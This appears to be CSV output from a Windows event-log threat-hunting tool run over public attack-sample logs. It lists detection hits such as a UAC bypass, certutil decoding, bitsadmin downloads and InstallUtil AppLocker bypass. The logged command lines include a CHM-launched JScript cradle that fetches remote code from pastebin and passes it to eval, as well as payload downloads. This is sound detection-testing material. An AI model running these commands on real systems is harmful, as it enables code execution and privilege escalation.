2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x509ff | PID: 3952 | PGUID: 747F3D96-DDB6-5D31-0000-0010273D4C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x509ff | PID: 2156 | PGUID: 747F3D96-DDC5-5D31-0000-0010A3414D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | Process: C:\Windows\hh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf99eb | PID: 1504 | PGUID: 747F3D96-AE22-5D3A-0000-001096B24E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,Evas,HH.exe Execution,,rules/sigma/process_creation/proc_creation_win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | LID: 0xf99eb | PID: 5548 | PGUID: 747F3D96-AE22-5D3A-0000-001004D84E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,Evas | Exec,HTML Help Shell Spawn,,rules/sigma/process_creation/proc_creation_win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | Process: C:\Users\IEUser\Downloads\UACBypass.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x235cdd | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:41.755 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32 | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:41.755 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\winSAT.exe | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:41.757 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:41.757 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\WINMM.dll | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235cdd | PID: 7128 | PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\UACBypass.exe | Tgt Process: C:\Windows \System32\winSAT.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6632 | Src PGUID: 747F3D96-D39D-5D3C-0000-001026F55500 | Tgt PID: 7128 | Tgt PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6820 324 0000022557280720 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4028 | PGUID: 747F3D96-D39E-5D3C-0000-0010EF395600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235bee | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.938 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:43.016 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Image: C:\Windows \System32\WINMM.dll | Process: C:\Windows \System32\winSAT.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-30 06:11:11.156 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Invoice@0582.cpl | Process: C:\Windows\Explorer.EXE | PID: 4600 | PGUID: 747F3D96-6056-5D3F-0000-0010C9EF4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x4131b5 | PID: 4996 | PGUID: 747F3D96-60F5-5D3F-0000-0010A7B65500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4356 | PGUID: 747F3D96-60F5-5D3F-0000-0010D1CF5500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4884 | PGUID: 747F3D96-60F5-5D3F-0000-0010A8D75500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt | Process: C:\Windows\SysWOW64\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 6160 | PGUID: 747F3D96-60F7-5D3F-0000-00106F2F5600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6336 362 00000298E04230D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6424 | PGUID: 747F3D96-6607-5D3F-0000-0010B3818500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x413182 | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3184 | PGUID: 747F3D96-660A-5D3F-0000-0010B9E08500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2576 | PGUID: 747F3D96-660A-5D3F-0000-001048E58500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | LID: 0x413182 | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:59.582 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\AllTheThings.dll | Process: C:\Windows\system32\certutil.exe | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:59.582 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-660F-5D3F-0000-00109B328600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2948 | PGUID: 747F3D96-660F-5D3F-0000-001055378600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | LID: 0x413182 | PID: 3896 | PGUID: 747F3D96-660F-5D3F-0000-00100F4F8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | LID: 0x413182 | PID: 6720 | PGUID: 747F3D96-660F-5D3F-0000-00106B508600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Evas | Persis,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/proc_creation_win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3756 | PGUID: 747F3D96-660F-5D3F-0000-00104D5B8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 108 | PGUID: 747F3D96-6614-5D3F-0000-001093CE8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7156 | PGUID: 747F3D96-6614-5D3F-0000-00104ED38600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | LID: 0x413182 | PID: 5696 | PGUID: 747F3D96-6614-5D3F-0000-0010BFD98600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,rules/sigma/process_creation/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
